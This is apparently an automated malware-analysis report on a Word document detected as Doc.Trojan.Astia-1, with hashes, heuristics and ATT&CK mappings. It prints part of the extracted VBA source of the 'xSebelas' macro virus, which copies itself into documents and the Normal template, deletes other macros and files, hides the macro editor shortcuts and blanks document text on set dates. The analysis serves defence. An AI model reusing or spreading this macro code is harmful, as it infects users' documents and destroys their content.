Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0c15b86ff07efbf…

MALICIOUS

Office (OLE)

237.0 KB Created: 1980-01-11 06:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f520b568a6fd2f7847ece6b5a57122d0 SHA-1: 0bcab673146e4a5689b51eeb6ae80261b028378c SHA-256: b0c15b86ff07efbf95541b9fabf3338033ce28026c97a0a8aaca4dfd1be7d416
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Astia-1'. It contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, indicating a macro-based attack. The VBA script 'xSebelas' attempts to copy itself and potentially execute further malicious code, as suggested by its structure and the presence of 'Kill' commands targeting related files.

Heuristics 5

  • ClamAV: Doc.Trojan.Astia-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Astia-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11022 bytes
SHA-256: ba1db20ff1c6b5a64c6094ae96c9c237c2e910ca453b2834840b5e73d6dd9df7
Detection
ClamAV: Doc.Trojan.Astia-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "xSebelas"
Public DokAktif As Object, xSTujuan As Variant
Public xSAda As Boolean, xSmusnahkan As Boolean, ReSet As Boolean, xSAExec As Boolean, _
DocCount As Boolean, CekFAutoBat As Boolean, CekFxBat As Boolean
Function xSebelasInit()
Dim nMakro(1) As String
Dim TempNormal As Object
Dim xSSumber$
On Error Resume Next
Kill Options.DefaultFilePath(8) & "\SNrml.src"
Kill Options.DefaultFilePath(8) & "\SNrml.dot"
Kill Options.DefaultFilePath(8) & "\win32s16.dll"
Kill Options.DefaultFilePath(8) & "\win32s16.dot"
On Error GoTo selesai
nMakro(0) = "xSebelas"
nMakro(1) = "xPose"
xSSumber = MacroContainer
Set TempNormal = NormalTemplate
If Not DocCount Then
Set DokAktif = ActiveDocument
ElseIf xSSumber <> "winsspi.dot" Then
xSSumber = TempNormal
End If
If xSSumber = TempNormal Then
xSSumber = TempNormal.FullName: Set xSTujuan = DokAktif
ElseIf xSSumber = DokAktif Then
xSSumber = DokAktif.FullName: Set xSTujuan = TempNormal
ElseIf xSSumber = "winsspi.dot" Then
Set xSTujuan = TempNormal
xSSumber = Options.DefaultFilePath(8) & "\bios.vxd"
End If
AntiMakro xSTujuan
With xSTujuan.VBProject
If Not (Not xSmusnahkan And .Description = "xSebelas" And .VBComponents.Count > 2) Then
    Mcopy xSSumber, xSTujuan, nMakro
    xSmusnahkan = False
    .Description = "xSebelas"
    If xSTujuan = TempNormal Then
        Options.SaveInterval = 1
        CustomizationContext = TempNormal
        CommandBars("Tools").ReSet
        FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
        FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
        On Error GoTo 0
        xSTujuan.Save
    End If
Else
GoTo Aksi
End If
End With
If xSAda = True Then Exit Function
ReFresh
On Error Resume Next
Aksi:
If xSAExec = True Then Exit Function
Exit Function
selesai:
End Function
Sub AntiMakro(fSumber)
Dim nMakro As Object
For Each nMakro In fSumber.VBProject.VBComponents
    If nMakro.Name <> "ThisDocument" And nMakro.Name <> "NewMacros" _
    And nMakro.Name <> "xSebelas" And nMakro.Name <> "xPose" Then
        xSmusnahkan = True
        If ReSet Then
        Application.OrganizerDelete fSumber.FullName, nMakro.Name, 3
        Else
        nMakro.CodeModule.DeleteLines 1, nMakro.CodeModule.CountOfLines
        End If
    End If
Next nMakro
End Sub
Sub Coba()
MsgBox Options.DefaultFilePath(4)
End Sub
Sub Mcopy(fSumber, Dfile, nMakro)
Dim xSNmakro
For Each xSNmakro In nMakro
Application.OrganizerCopy fSumber, Dfile.FullName, xSNmakro, 3
Next
End Sub
Sub Iklan()
xPose.Show
Application.OnTime When:=Now + TimeValue("00:30:00"), Name:="xSebelas.Iklan"
End Sub
Sub FileOpen()
WordBasic.DisableAutoMacros True
If Dialogs(80).Show <> 0 Then
WordBasic.DisableAutoMacros False
AutoOpen
Else
WordBasic.DisableAutoMacros False
End If
End Sub
Sub AutoOpen()
On Error Resume Next
If Now > DateSerial(1999, 4, 11) And Day(Now) = 11 Then GoTo Putihkan
If Month(Now) = 11 Then GoTo CekTanggal1
If Month(Now) = 10 Then GoTo CekTanggal2
If Month(Now) = 2 Then GoTo CekTanggal3
GoTo EndCekTanggal
Putihkan:
Selection.WholeStory
    Selection.Font.ColorIndex = wdWhite
    Selection.MoveLeft Unit:=wdCharacter, Count:=1
    Selection.Font.ColorIndex = wdBlack
    Selection.TypeText Text:="Viva eX-SeBeLaS !"
GoTo EndCekTanggal
CekTanggal1:
If Day(Now) = 1 Then MsgBox "'Met ulang tahun Erry Delphiero !", vbInformation, "eX-Sebelas release 3.9"
GoTo EndCekTanggal
CekTanggal2:
If Day(Now) = 7 Then MsgBox "'Met ulang tahun DaNnY DeSPiRo !", vbInformation, "eX-Sebelas release 3.9"
GoTo EndCekTanggal
CekTanggal3:
If Day(Now) = 4 Then MsgBox "'Met ulang tahun Natalie Imbruglia !", vbInformation, "eX-Sebelas release 3.9"
EndCekTanggal:
Application.EnableCancelKey = wdCancelDisabled
xSebelasInit
If Documents.Count > 1 Then
    F
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.